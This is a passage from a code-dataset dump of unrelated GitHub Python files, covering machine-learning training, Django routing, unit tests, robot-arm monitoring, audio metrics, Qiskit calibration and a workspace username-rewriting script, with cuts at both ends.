retry_base_interval * random.random()\n elif mode == 'multiply':\n retry_wait_interval = which_retry * retry_base_interval\n elif mode == 'multirand':\n retry_wait_interval = which_retry * retry_base_interval * random.random()\n\n return {'mode': mode, 'interval': retry_wait_interval, 'retry': which_retry}\n","repo_name":"emptymalei/tram-bot","sub_path":"app/utils/universal.py","file_name":"universal.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1843913922","text":"import matplotlib.pyplot as plt\nimport random\nimport math\nimport sys\nimport subprocess\nimport numpy as np\n\n\nmode = 0 if sys.argv[1] == \"WTA\" else 1\neps = 0.001\nl = 3.0\nalpha = 0.1\nit = 0\nnCentroids = 10\ndef dist(a, b):\n return np.sqrt((b[0] - a[0])**2 + (b[1] - a[1])**2)\n\n\ndef generatePoints():\n points = []\n while len(points) != 100:\n tmp = [random.uniform(-5, -1), random.uniform(-2, 2)]\n if dist(tmp, [-3, 0]) < 2:\n points.append(tmp)\n\n while len(points) != 200:\n tmp = [random.uniform(1, 5), random.uniform(-2, 2)]\n if dist(tmp, [3, 0]) < 2:\n points.append(tmp)\n\n random.shuffle(points)\n return points\n\n\ndef generateCentroids():\n c = []\n for i in range(nCentroids):\n c.append([random.uniform(-10, 10), random.uniform(-10, 10)])\n random.seed(random.random())\n\n return c\n\ndef drawGraph(X, c):\n plt.clf()\n\n plt.scatter([i[0] for i in X], [i[1] for i in X], s=2, c='k')\n plt.scatter([i[0] for i in c], [i[1] for i in c], s=6, c='r')\n plt.plot([i[0] for i in c], [i[1] for i in c], 'r')\n plt.axis([-10.1, 10.1, -10.1, 10.1])\n plt.grid() \n global it\n plt.savefig(\"plot\" + str(it))\n it += 1\n # plt.show()\n\ndef findMinK(point, c):\n k = dist(point, c[0])\n q = 0\n for j in range(1, len(c)):\n d = dist(point, c[j])\n if d < k:\n k = d\n q = j\n\n return q\n\ndef calculateError(points, c):\n error = []\n for i in range(len(points)):\n error.append(dist(points[i], c[findMinK(points[i], c)]))\n return sum(error) / len(error)\n\ndef findRo(k, i):\n return abs(k - i)\n\ndef influence(k, kx):\n w = 0\n if not mode:\n if k == kx:\n w = 1\n return w\n else:\n w = (findRo(k, kx)**2) / (2 * l**2)\n return np.exp(-w)\n\npoints = generatePoints()\nc = generateCentroids()\nerror = []\nprevErr = calculateError(points, c)\nprint(prevErr)\ndrawGraph(points, c)\n\nfor i in range(int(sys.argv[2])):\n for j in range(len(points)):\n k = findMinK(points[j], c)\n for q in range(len(c)):\n inf = influence(q, k)\n c[q][0] = c[q][0] + alpha * inf * (points[j][0] - c[q][0])\n c[q][1] = c[q][1] + alpha * inf * (points[j][1] - c[q][1])\n if j % 10 == 0 and l > 0.5:\n l -= 0.5\n newErr = calculateError(points, c)\n print(newErr)\n prevErr = newErr\n error.append(prevErr)\n if i < 30 or i % 25 == 0: drawGraph(points, c)\n random.shuffle(points)\n\nplt.clf()\nplt.axis([0, len(error), min(error) - 0.1, max(error) + 0.1])\nplt.plot([i for i in range(len(error))], [i for i in error])\nplt.savefig(\"error\")\n","repo_name":"horseburger/IAD","sub_path":"task_2/warmup_5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34668507112","text":"import numpy as np\nfrom tensorflow.keras.optimizers import Adam\nimport tensorflow as tf\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfont = {'size' : 16}\nmatplotlib.rc('font', **font)\nimport time\nimport pickle\nfrom visco_aux import Ndpdti, dphidtaui_gov\n\ntaui = np.mgrid[-10000:10000:10j, -10000:10000:10j, -10000:10000:10j]\ntaui = taui.reshape([3,-1]).transpose()\n\ntaui = -np.sort(-taui)\ndphidtaui = np.zeros_like(taui)\nfor i in range(taui.shape[0]):\n dphidtaui[i] = dphidtaui_gov(taui[i])\n\ninputs = taui\noutputs = [dphidtaui[:,0], dphidtaui[:,1], dphidtaui[:,2]]\n\nstarttime = time.time()\nmodel = Ndpdti()\nmodel.inp.mean = tf.Variable([[np.mean(inputs) ]],dtype=tf.float32)\nmodel.inp.sd = tf.Variable([[np.std(inputs) ]],dtype=tf.float32)\nmodel.out.mean = tf.Variable([[np.mean(outputs)]],dtype=tf.float32)\nmodel.out.sd = tf.Variable([[np.std(outputs) ]],dtype=tf.float32)\nmodel.compile(loss = 'MSE', optimizer = Adam(learning_rate = 0.001))\nfit = model.fit(inputs, outputs, epochs = 5000, verbose = 0, workers=8)\ntrtime = time.strftime('%H:%M:%S', time.gmtime(time.time() - starttime))\nprint('Training time: ', trtime)\n\nweights = model.get_weights()\nwith open('saved/weights.pickle', 'wb') as f:\n pickle.dump(weights,f)\n\nwith open('saved/io.pickle', 'wb') as f:\n pickle.dump([inputs, outputs], f)\n\nfig, ax = plt.subplots()\nax.plot(fit.history['loss'])\nax.set_yscale('log')\nax.set(title='Loss: {loss:.3f}'.format(loss = fit.history['loss'][-1]), ylabel='Loss')\nfig.savefig('saved/loss.png')\n","repo_name":"tajtac/nvisco","sub_path":".ipynb_checkpoints/fit_dphidtA_tf-checkpoint.py","file_name":"fit_dphidtA_tf-checkpoint.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15906364951","text":"from django.conf.urls import patterns, include, url\nfrom .views import Inicio, Exito, AltaUpdate, AltaWindows, Configuracion\n\nurlpatterns = patterns('',\n # Examples:\n \turl(r'^$', Inicio.as_view()),\n \t#url(r'^$', AltaUpdate , name=\"inicio\"),\n \t#url(r'^$', AltaWindows , name=\"inicio\"),\n \turl(r'^update/$', AltaUpdate , name=\"update\"),\n \turl(r'^windows/$', AltaWindows , name=\"windows\"),\n \turl(r'^exito/$', Exito.as_view()),\n \turl(r'^configuracion/$', Configuracion.as_view(), name=\"config\")\n)\n","repo_name":"sk8ivan/inegi","sub_path":"inegi/apps/inicio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71741347797","text":"import pytest\nfrom django.core.management import call_command\nfrom marketplace.models import Category\nfrom marketplace.models import CategoryGroup\nfrom marketplace.models import Marketplace\nfrom marketplace.models import Product\nfrom marketplace.models import ProductPage\nfrom marketplace.models import ProductState\n\nmarketplace = Marketplace(\n domain='www.test.by',\n description='too long',\n logo_url='https://test',\n delivery=False\n)\n\ncategory = Category(\n name='electronic',\n keywords='electronic',\n)\n\ncategory_group = CategoryGroup(\n category=category,\n parent=None,\n ru='Электроника',\n)\n\nproduct = Product(\n name='iPone',\n category=category,\n description='??',\n)\n\nproduct_page = ProductPage(\n product=product,\n marketplace=marketplace,\n url='www.test.by/ipone',\n)\n\nproduct_state = ProductState(\n product_page=product_page,\n price=199,\n price_currency='BYN',\n)\n\n\ndef test_marketplace_is_printable_ok():\n assert str(marketplace) == 'www.test.by'\n\n\ndef test_category_is_printable_ok():\n assert str(category) == 'electronic'\n\n\ndef test_category_group_is_printable_ok():\n assert str(category_group) == 'electronic'\n\n\ndef test_product_is_printable_ok():\n assert str(product) == 'iPone'\n\n\ndef test_semantic_id_ok():\n assert product.semantic_id == 'electronic/ipone'\n\n\ndef test_product_page_is_printable_ok():\n assert str(product_page) == 'iPone [www.test.by]'\n\n\ndef test_product_state_is_printable_ok():\n assert str(product_state) == 'iPone [www.test.by] [199 BYN]'\n\n\n@pytest.mark.django_db\ndef test_load_dump_ok():\n call_command('loaddata', 'dump/marketplace.yaml')\n\n\n@pytest.mark.django_db\ndef test_load_prod_ok():\n call_command('loaddata', 'prod/categories.yaml')\n call_command('loaddata', 'prod/marketplaces.yaml')\n","repo_name":"zifter/byprice24","sub_path":"backend/src/marketplace/models_tests.py","file_name":"models_tests.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36773526258","text":"\"\"\"\n#UR Controller Client Interface Datastream Reader\n# For software version 3.x\n#\n# Datastream info found here: https://s3-eu-west-1.amazonaws.com/ur-support-site/16496/Client_Interface.xlsx\n# Struct library used to extract data, info found here: https://docs.python.org/2/library/struct.html\n\"\"\"\n\nimport socket\nimport time\nfrom contextlib import contextmanager\nfrom threading import Lock, Thread, Event\nfrom typing import Dict, Any, Optional\n\nfrom urx.ursecmon import ParserUtils, ParsingException\n\n\nclass URRobotPrimary:\n def __init__(self, ip: str, timeout: float = 5):\n \"\"\"\n The primary interface (30011, read-only) to UR Robot\n\n This is used to monitor the popup in the robot arm.\n\n Args:\n ip: the ip address to the UR Robot\n timeout: timeout time in sec\n \"\"\"\n # set up socket connection\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.settimeout(timeout)\n self._socket.connect((ip, 30011))\n time.sleep(0.1)\n self._socket.recv(4096)\n\n self._parser = ParserUtils()\n\n self._thread = None\n self._mutex_lock = Lock()\n\n self._stop_event = Event()\n\n self._popup_title: Optional[str] = None\n self._popup_message: Optional[str] = None\n\n def close(self):\n self._socket.close()\n\n def read_data(self) -> Dict[str, Any]:\n self._mutex_lock.acquire()\n\n try:\n data = self._socket.recv(4096)\n try:\n data = self._parser.parse(data)\n except ParsingException:\n return {}\n return data\n except:\n return {}\n finally:\n self._mutex_lock.release()\n\n def read_popup(self):\n data = self.read_data()\n if \"popupMessage\" in data:\n return {\n \"title\": data[\"popupMessage\"][\"messageTitle\"].decode(\"utf-8\"),\n \"message\": data[\"popupMessage\"][\"messageText\"].decode(\"utf-8\"),\n }\n return None\n\n def keep_monitoring_popup(self):\n while True:\n if not self._stop_event.is_set():\n popup = self.read_popup()\n if popup is not None:\n self._popup_message = popup[\"message\"]\n self._popup_title = popup[\"title\"]\n else:\n break\n time.sleep(0.1)\n\n @contextmanager\n def monitor_popup(self):\n need_release = False\n try:\n if self._thread is None:\n self._thread = Thread(target=self.keep_monitoring_popup)\n self._thread.start()\n need_release = True\n yield self\n finally:\n if need_release:\n self._stop_event.set()\n self._thread.join()\n self._thread = None\n self._stop_event.clear()\n self.clear_popup_cache()\n\n @property\n def popup_title(self) -> Optional[str]:\n return self._popup_title\n\n @property\n def popup_message(self) -> Optional[str]:\n return self._popup_message\n\n def clear_popup_cache(self):\n \"\"\"\n Clear the cache of popup message and title\n\n It should be used with the close popup\n \"\"\"\n self._popup_title = None\n self._popup_message = None\n","repo_name":"CederGroupHub/alab_control","sub_path":"alab_control/robot_arm_ur5e/ur_robot_primary.py","file_name":"ur_robot_primary.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"71631603797","text":"\nimport typing as tp\nimport os\nimport logging\nimport json\nimport random\nimport multiprocessing\nfrom datetime import datetime\nfrom itertools import combinations\n\nimport torch\nimport torchaudio\nimport numpy\nimport librosa\n\nfrom .datanodes import DataNode\n\n_metric_cls_map = dict()\n_metric_name_map = dict()\n\ndef get_metric_cls(name):\n return _metric_cls_map[name]\n\ndef get_metric_name(cls):\n return _metric_name_map[cls]\n\ndef add_metric_cls(name, cls):\n _metric_cls_map[name] = cls\n _metric_name_map[cls] = name\n\nclass MetricSpec(object):\n def __init__(self,\n metric_name : str,\n input_metadata_path : str,\n output_metadata_path : str,\n seed : int,\n journal_path : str,\n log_path : str,\n log_level : str,\n jobs : int=None,\n device : str='cpu'):\n\n self.metric_name = metric_name\n self.input_metadata_path = input_metadata_path\n self.output_metadata_path = output_metadata_path\n self.seed = seed\n self.journal_path = journal_path\n self.log_level = log_level\n self.log_path = log_path\n self.jobs = jobs\n self.device = device\n\n @classmethod\n def from_dict(cls, d : tp.Dict):\n metric_cls = get_metric_cls(d['type'])\n metric_args = metric_cls.additional_args(d)\n return metric_cls(\n metric_name=d['metric_name'],\n input_metadata_path=d['input_metadata_path'],\n output_metadata_path=d['output_metadata_path'],\n seed=d.get('seed') or None,\n journal_path=d['journal_path'],\n log_level=d.get('log_level') or 'INFO',\n log_path=d['log_path'],\n jobs=d.get('jobs'),\n device=d.get('device') or 'cpu',\n **metric_args\n )\n\n @classmethod\n def additional_args(cls, d : tp.Dict):\n return dict()\n\n def to_dict(self):\n return dict(\n type=get_metric_name(type(self)),\n metric_name=self.metric_name,\n input_metadata_path=str(self.input_metadata_path),\n output_metadata_path=str(self.output_metadata_path),\n seed=self.seed,\n journal_path=str(self.journal_path) if self.journal_path else None,\n log_level=self.log_level,\n log_path=str(self.log_path) if self.log_path else None,\n jobs=self.jobs,\n device=self.device,\n **(self.metric_args())\n )\n\n def metric_args(self):\n return dict()\n\n def put_single_metric(self, data, metadata):\n raise NotImplementedError()\n\n def put_metrics(self):\n _put_metrics(self)\n\nclass MetricJournal(object):\n def __init__(self,\n created_at : datetime,\n seed : int,\n metric_value : float):\n self.created_at = created_at\n self.seed = seed\n self.metric_value = metric_value\n\n @classmethod\n def from_dict(cls, d : tp.Dict):\n return cls(\n created_at=datetime.fromisoformat(d['created_at']),\n seed=d['seed'],\n metric_value=d['metric_value'],\n )\n\n def to_dict(self):\n return {\n 'created_at': self.created_at.isoformat(),\n 'seed': self.seed,\n 'metric_value': self.metric_value,\n }\n\nclass MetricSetJournal(object):\n def __init__(self,\n process_start : datetime,\n process_finish : datetime,\n metadata_path : str,\n log_path : str,\n spec,\n metric_journals : tp.List[MetricJournal]):\n self.process_start = process_start\n self.process_finish = process_finish\n self.metadata_path = metadata_path\n self.log_path = log_path\n self.spec = spec\n self.metric_journals = metric_journals\n\n @classmethod\n def from_dict(cls, d : tp.Dict):\n return cls(\n process_start=datetime.fromisoformat(d['process_start']),\n process_finish=datetime.fromisoformat(d['process_finish']),\n metadata_path=d['metadata_path'],\n log_path=d.get('log_path'),\n spec=MetricSpec.from_dict(d['spec']),\n metric_journals=[\n MetricJournal.from_dict(j) if j else None\n for j in d['metric_journals']\n ] if d.get('metric_journals') else None\n )\n\n def to_dict(self):\n return {\n 'process_start': self.process_start.isoformat(),\n 'process_finish': self.process_finish.isoformat(),\n 'metadata_path': str(self.metadata_path) if self.metadata_path else None,\n 'log_path': str(self.log_path) if self.log_path else None,\n 'spec': self.spec.to_dict(),\n 'metric_journals': [\n j.to_dict() if j else None for j in self.metric_journals\n ] if self.metric_journals else None\n }\n\n\nclass EntropyDifficulty(MetricSpec):\n def __init__(self,\n metric_name : str,\n input_metadata_path : str,\n output_metadata_path : str,\n seed : int,\n journal_path : str,\n log_path : str,\n log_level : str,\n jobs : int=None,\n device : str='cpu',\n n_fft : int=2048,\n win_length : int=2048,\n hop_length : int=512,\n ):\n\n super().__init__(\n metric_name=metric_name,\n input_metadata_path=input_metadata_path,\n output_metadata_path=output_metadata_path,\n seed=seed,\n journal_path=journal_path,\n log_path=log_path,\n log_level=log_level,\n jobs=jobs,\n device=device,\n )\n self.n_fft = n_fft\n self.win_length = win_length\n self.hop_length = hop_length\n\n def put_single_metric(self, data, metadata):\n specgrams = [\n torch.stft(\n d['wave'],\n n_fft=self.n_fft,\n hop_length=self.hop_length,\n win_length=self.win_length,\n return_complex=True,\n ).abs().clamp(min=1e-3) ** 2\n for d in data\n ]\n\n total_specgram = sum(specgrams)\n score = sum(\n torch.sum(-specgram/total_specgram\n * torch.log2(specgram/total_specgram))\n for specgram in specgrams\n ) / total_specgram.numel()\n return score.item()\n\n @classmethod\n def additional_args(cls, d : tp.Dict):\n return {\n 'n_fft': d.get('n_fft') or 2048,\n 'win_length': d.get('win_length') or 2048,\n 'hop_length': d.get('hop_length') or 512,\n }\n\n def metric_args(self):\n return {\n 'n_fft': self.n_fft,\n 'win_length': self.win_length,\n 'hop_length': self.hop_length,\n }\n\nadd_metric_cls('entropy', EntropyDifficulty)\n\nclass FrequencyDifficulty(MetricSpec):\n def __init__(self,\n metric_name : str,\n input_metadata_path : str,\n output_metadata_path : str,\n seed : int,\n sample_rate : int,\n journal_path : str,\n log_path : str,\n log_level : str,\n jobs : int=None,\n device : str='cpu',\n win_length : int=2048\n ):\n\n super().__init__(\n metric_name=metric_name,\n input_metadata_path=input_metadata_path,\n output_metadata_path=output_metadata_path,\n seed=seed,\n journal_path=journal_path,\n log_path=log_path,\n log_level=log_level,\n jobs=jobs,\n device=device,\n )\n self.sample_rate = sample_rate\n self.win_length = win_length\n\n def put_single_metric(self, data, metadata):\n waves = numpy.stack([d['wave'].numpy() for d in data])\n f0, voiced_flag, voiced_prob = librosa.pyin(\n waves,\n fmin=librosa.note_to_hz('C2'),\n fmax=librosa.note_to_hz('C7'),\n sr=self.sample_rate,\n frame_length=self.win_length,\n )\n f0 = numpy.nan_to_num(f0, nan=0.0)\n score = sum(\n numpy.abs(f0_a - f0_b).sum().item()\n for f0_a, f0_b in combinations(f0, 2)\n ) / (len(f0)*(len(f0)-1)/2 * f0.shape[-1])\n\n return score\n\n @classmethod\n def additional_args(cls, d : tp.Dict):\n return {\n 'sample_rate': d['sample_rate'],\n 'win_length': d.get('win_length') or 2048,\n }\n\n def metric_args(self):\n return {\n 'sample_rate': self.sample_rate,\n 'win_length': self.win_length,\n }\n\nadd_metric_cls('frequency', FrequencyDifficulty)\n\ndef _put_metrics(spec : MetricSpec):\n\n process_start = datetime.now()\n\n # setup seed\n random_ = random.Random(spec.seed)\n\n # prepare log\n logger = None\n if spec.log_path:\n if not os.path.exists(os.path.dirname(spec.log_path)):\n os.makedirs(os.path.dirname(spec.log_path), exist_ok=True)\n logger = logging.getLogger(__name__)\n logger.setLevel(spec.log_level)\n handler = logging.FileHandler(str(spec.log_path))\n handler.setFormatter(\n logging.Formatter('[%(levelname)s] %(message)s'))\n logger.addHandler(handler)\n\n # load metadata\n with open(spec.input_metadata_path, 'r') as fp:\n datanode = DataNode.from_dict(\n json.load(fp),\n context={\n 'rel_path': os.path.dirname(spec.input_metadata_path),\n 'device': spec.device,\n },\n )\n chain_lists = [\n datanode.get_single_chain(i) for i in range(len(datanode))\n ]\n\n # prepare arguments\n args = [(\n sample_i,\n chain_list,\n spec,\n random_.randrange(2**32), #seed,\n ) for sample_i, chain_list in enumerate(chain_lists)]\n\n # map func\n if spec.jobs is not None:\n pool = multiprocessing.Pool(spec.jobs)\n map_fn = pool.imap_unordered\n else:\n map_fn = map\n\n if logger:\n logger.info(json.dumps({\n 'type': 'start_mixing',\n 'timestamp': datetime.now().isoformat(),\n 'input_sample_size': len(chain_lists),\n }))\n\n # iterate over dataset and find mixtures\n leaf_nodes = datanode.list_leaf_node()\n journal_list = [None for _ in range(len(datanode))]\n for i, metric_value, journals in map_fn(_make_metric_for_sample, args):\n leaf_nodes[i].push_metric(spec.metric_name, metric_value)\n journal_list[i] = journals\n if logger:\n logger.info(json.dumps({\n 'type': 'made_metric',\n 'timestamp': datetime.now().isoformat(),\n 'sample_index': i,\n 'metric_name': spec.metric_name,\n 'metric_value': metric_value,\n }))\n\n # close map function\n if spec.jobs is not None:\n pool.close()\n\n process_finish = datetime.now()\n\n # save metadata\n if not os.path.exists(os.path.dirname(spec.output_metadata_path)):\n os.makedirs(os.path.dirname(spec.output_metadata_path))\n with open(spec.output_metadata_path, 'w') as fp:\n json.dump(datanode.to_dict(), fp)\n\n if logger:\n logger.info(json.dumps({\n 'type': 'save_mixtures',\n 'timestamp': datetime.now().isoformat(),\n 'output_path': str(spec.output_metadata_path),\n 'output_size': len(datanode),\n }))\n\n # save journal\n if spec.journal_path is not None:\n if not os.path.exists(os.path.dirname(spec.journal_path)):\n os.makedirs(os.path.dirname(spec.journal_path))\n metric_journal = MetricSetJournal(\n process_start=process_start,\n process_finish=process_finish,\n metadata_path=os.path.relpath(\n spec.output_metadata_path,\n os.path.dirname(spec.journal_path)\n ),\n log_path=os.path.relpath(\n spec.output_metadata_path,\n os.path.dirname(spec.log_path)\n ) if spec.log_path else None,\n spec=spec,\n metric_journals=journal_list,\n )\n with open(spec.journal_path, 'w') as fp:\n json.dump(metric_journal.to_dict(), fp)\n\n if logger:\n logger.info(json.dumps({\n 'type': 'save_metric_journal',\n 'timestamp': datetime.now().isoformat(),\n 'journal_path': str(spec.journal_path),\n }))\n\n # finish epoch and close log handler\n if logger:\n logger.info(json.dumps({\n 'type': 'finish_metric',\n 'timestamp': datetime.now().isoformat(),\n }))\n handlers = logger.handlers[:]\n for handler in handlers:\n logger.removeHandler(handler)\n handler.close()\n\n\ndef _make_metric_for_sample(args):\n sample_i, node_list, spec, seed = args\n data, metadata = DataNode.process_single_chain(node_list)\n metric_value = spec.put_single_metric(data, metadata)\n journal = MetricJournal(created_at=datetime.now(),\n seed=seed,\n metric_value=metric_value)\n\n return sample_i, metric_value, journal\n\n","repo_name":"leichtrhino/echidna","sub_path":"echidna/data/difficulties.py","file_name":"difficulties.py","file_ext":"py","file_size_in_byte":13499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38316265299","text":"import logging\nimport unittest\nfrom typing import Any, Dict\n\nfrom mock import patch\nfrom pyhocon import ConfigFactory\n\nfrom databuilder import Scoped\nfrom databuilder.extractor.dashboard.tableau.tableau_dashboard_query_extractor import TableauDashboardQueryExtractor\nfrom databuilder.extractor.dashboard.tableau.tableau_dashboard_utils import (\n TableauDashboardAuth, TableauGraphQLApiExtractor,\n)\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef mock_query(*_args: Any, **_kwargs: Any) -> Dict[str, Any]:\n return {\n 'customSQLTables': [\n {\n 'id': 'fake-query-id',\n 'name': 'Test Query',\n 'query': 'SELECT * FROM foo',\n 'downstreamWorkbooks': [\n {\n 'name': 'Test Workbook',\n 'projectName': 'Test Project'\n }\n ]\n }\n ]\n }\n\n\ndef mock_token(*_args: Any, **_kwargs: Any) -> str:\n return '123-abc'\n\n\nclass TestTableauDashboardQuery(unittest.TestCase):\n\n @patch.object(TableauDashboardAuth, '_authenticate', mock_token)\n @patch.object(TableauGraphQLApiExtractor, 'execute_query', mock_query)\n def test_dashboard_query_extractor(self) -> None:\n\n config = ConfigFactory.from_dict({\n 'extractor.tableau_dashboard_query.api_base_url': 'api_base_url',\n 'extractor.tableau_dashboard_query.api_version': 'tableau_api_version',\n 'extractor.tableau_dashboard_query.site_name': 'tableau_site_name',\n 'extractor.tableau_dashboard_query.tableau_personal_access_token_name':\n 'tableau_personal_access_token_name',\n 'extractor.tableau_dashboard_query.tableau_personal_access_token_secret':\n 'tableau_personal_access_token_secret',\n 'extractor.tableau_dashboard_query.excluded_projects': [],\n 'extractor.tableau_dashboard_query.cluster': 'tableau_dashboard_cluster',\n 'extractor.tableau_dashboard_query.database': 'tableau_dashboard_database',\n 'extractor.tableau_dashboard_query.transformer.timestamp_str_to_epoch.timestamp_format':\n '%Y-%m-%dT%H:%M:%SZ',\n\n })\n\n extractor = TableauDashboardQueryExtractor()\n extractor.init(Scoped.get_scoped_conf(conf=config, scope=extractor.get_scope()))\n record = extractor.extract()\n\n self.assertEqual(record._query_name, 'Test Query')\n self.assertEqual(record._query_text, 'SELECT * FROM foo')\n self.assertEqual(record._dashboard_id, 'Test Workbook')\n self.assertEqual(record._dashboard_group_id, 'Test Project')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"amundsen-io/amundsen","sub_path":"databuilder/tests/unit/extractor/dashboard/tableau/test_tableau_dashboard_query_extractor.py","file_name":"test_tableau_dashboard_query_extractor.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":4118,"dataset":"github-code","pt":"85"} +{"seq_id":"15987718723","text":"class Solution:\n def SortColors(self, nums: [int]):\n rez = {0: 0, 1: 0, 2: 0}\n\n for i in nums:\n rez[i] += 1\n\n k = 0\n for i in range(len(nums)):\n if rez[k] != 0:\n nums[i] = k\n rez[k] -= 1\n else:\n k += 1\n nums[i] = k\n rez[k] -= 1\n\n print(nums)\n\n\nif __name__ == '__main__':\n solution = Solution()\n\n solution.SortColors([0, 2])\n","repo_name":"RndmCodeGuy20/Striver-Sheet","sub_path":"Day 1 - Arrays I/75. Sort Colors/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35915771245","text":"from typing import Dict, List, Optional, Sequence\n\nfrom qiskit.circuit import QuantumCircuit\nfrom qiskit.providers.backend import Backend\n\nfrom qiskit_experiments.framework import ExperimentData\nfrom qiskit_experiments.library.characterization.ramsey_xy import RamseyXY\nfrom qiskit_experiments.calibration_management.calibrations import Calibrations\nfrom qiskit_experiments.calibration_management.update_library import BaseUpdater\nfrom qiskit_experiments.calibration_management.base_calibration_experiment import (\n BaseCalibrationExperiment,\n)\n\n\nclass FrequencyCal(BaseCalibrationExperiment, RamseyXY):\n \"\"\"A qubit frequency calibration experiment based on the Ramsey XY experiment.\"\"\"\n\n def __init__(\n self,\n physical_qubits: Sequence[int],\n calibrations: Calibrations,\n backend: Optional[Backend] = None,\n cal_parameter_name: Optional[str] = \"drive_freq\",\n delays: Optional[List] = None,\n osc_freq: float = 2e6,\n auto_update: bool = True,\n ):\n \"\"\"\n Args:\n physical_qubits: Sequence containing the qubit on which to run the\n frequency calibration.\n calibrations: The calibrations instance with the schedules.\n backend: Optional, the backend to run the experiment on.\n cal_parameter_name: The name of the parameter to update in the calibrations.\n This defaults to `drive_freq`.\n delays: The list of delays that will be scanned in the experiment, in seconds.\n osc_freq: A frequency shift in Hz that will be applied by means of\n a virtual Z rotation to increase the frequency of the measured oscillation.\n auto_update: If set to True, which is the default, then the experiment will\n automatically update the frequency in the calibrations.\n \"\"\"\n super().__init__(\n calibrations,\n physical_qubits,\n backend=backend,\n delays=delays,\n osc_freq=osc_freq,\n cal_parameter_name=cal_parameter_name,\n auto_update=auto_update,\n )\n\n def _metadata(self) -> Dict[str, any]:\n \"\"\"Add the oscillation frequency of the experiment to the metadata.\"\"\"\n metadata = super()._metadata()\n metadata[\"osc_freq\"] = self.experiment_options.osc_freq\n metadata[\"cal_param_value\"] = self._cals.get_parameter_value(\n self._param_name,\n self.physical_qubits,\n group=self.experiment_options.group,\n )\n\n return metadata\n\n def _attach_calibrations(self, circuit: QuantumCircuit):\n \"\"\"Adds the calibrations to the transpiled circuits.\"\"\"\n schedule = self._cals.get_schedule(\"sx\", self.physical_qubits)\n circuit.add_calibration(\"sx\", self.physical_qubits, schedule)\n\n def update_calibrations(self, experiment_data: ExperimentData):\n \"\"\"Update the frequency using the reported frequency less the imparted oscillation.\"\"\"\n\n result_index = self.experiment_options.result_index\n osc_freq = experiment_data.metadata[\"osc_freq\"]\n group = experiment_data.metadata[\"cal_group\"]\n old_freq = experiment_data.metadata[\"cal_param_value\"]\n\n fit_freq = BaseUpdater.get_value(experiment_data, \"freq\", result_index)\n new_freq = old_freq + fit_freq - osc_freq\n\n BaseUpdater.add_parameter_value(\n self._cals,\n experiment_data,\n new_freq,\n self._param_name,\n group=group,\n )\n","repo_name":"Qiskit-Extensions/qiskit-experiments","sub_path":"qiskit_experiments/library/calibration/frequency_cal.py","file_name":"frequency_cal.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"85"} +{"seq_id":"37678149050","text":"'''\nCreated on 19 Jun 2021\n\n@author: pgm\n'''\nimport acq400_hapi\nimport argparse\nimport os\nimport re\nimport sys\n\ndef ui():\n parser = argparse.ArgumentParser(description='acq400_remote_script') \n parser.add_argument('-v','--verbose', default=0, help=\"show more info\")\n parser.add_argument('--olduser', default=None, help=\"user name to change\")\n parser.add_argument('--newuser', default=None, help=\"user name to change\")\n# parser.add_argument('--uuts', default=None, help=\"uuts to change [uut[1][,uut2[,uut3...]]]]\")\n parser.add_argument('ws', nargs='+', help=\"workspace[s] to change\")\n args = parser.parse_args()\n return args\n \n\n# ASCII ROOLS OK, BackSlash, ForwardSlash\nBS = 0x5c\nFS = 0x2f\n\n# URI is in Unix notation, AND must have leading FS\n'''\n[pgm@hoy5 acq400_hapi]$ hexdump -C /home/pgm/SANDBOX/DOC-215920-01-FAT/.metadata/.plugins/org.eclipse.core.resources/.projects/ACQ400/.location\n00000000 40 b1 8b 81 23 bc 00 14 1a 25 96 e7 a3 93 be 1e |@...#....%......|\n00000010 00 2d 55 52 49 2f 2f 66 69 6c 65 3a 2f 43 3a 2f |.-URI//file:/C:/|\n00000020 55 73 65 72 73 2f 70 67 6d 30 30 2f 50 52 4f 4a |Users/pgm00/PROJ|\n00000030 45 43 54 53 2f 41 43 51 34 30 30 43 53 53 2f 41 |ECTS/ACQ400CSS/A|\n00000040 43 51 34 30 30 00 00 00 00 00 00 00 00 c0 58 fb |CQ400.........X.|\n00000050 f3 23 bc 00 14 1a 51 f3 8c 7b bb 77 c6 |.#....Q..{.w.|\n\n'''\n\ndef fixup(args, ws):\n print(\"fixup {}\".format(ws))\n for subdir, dirs, files in os.walk(ws):\n for file in files:\n path = subdir+os.sep+file\n print(path)\n file_changed = False\n wmode = None\n \n if path.endswith(\".old\"):\n continue\n \n try:\n with open(path, 'r') as fp:\n text = fp.read()\n for match in re.finditer(args.pat, text):\n print(\"MATCH {} start:{} end:{}\".format(match, match.start(), match.end()))\n file_changed = True\n wmode = 'w'\n \n if file_changed:\n text = text.replace(args.olduser, args.newuser)\n \n except UnicodeDecodeError:\n with open(path, 'rb') as fp:\n text = fp.read()\n \n for match in re.finditer(args.bpat, text):\n print(\"Binary File match {} start:{} end:{}\".format(match, match.start(), match.end()))\n print(\"here is our match {}\".format(text[match.start():match.end()]))\n print(\"here is what's next 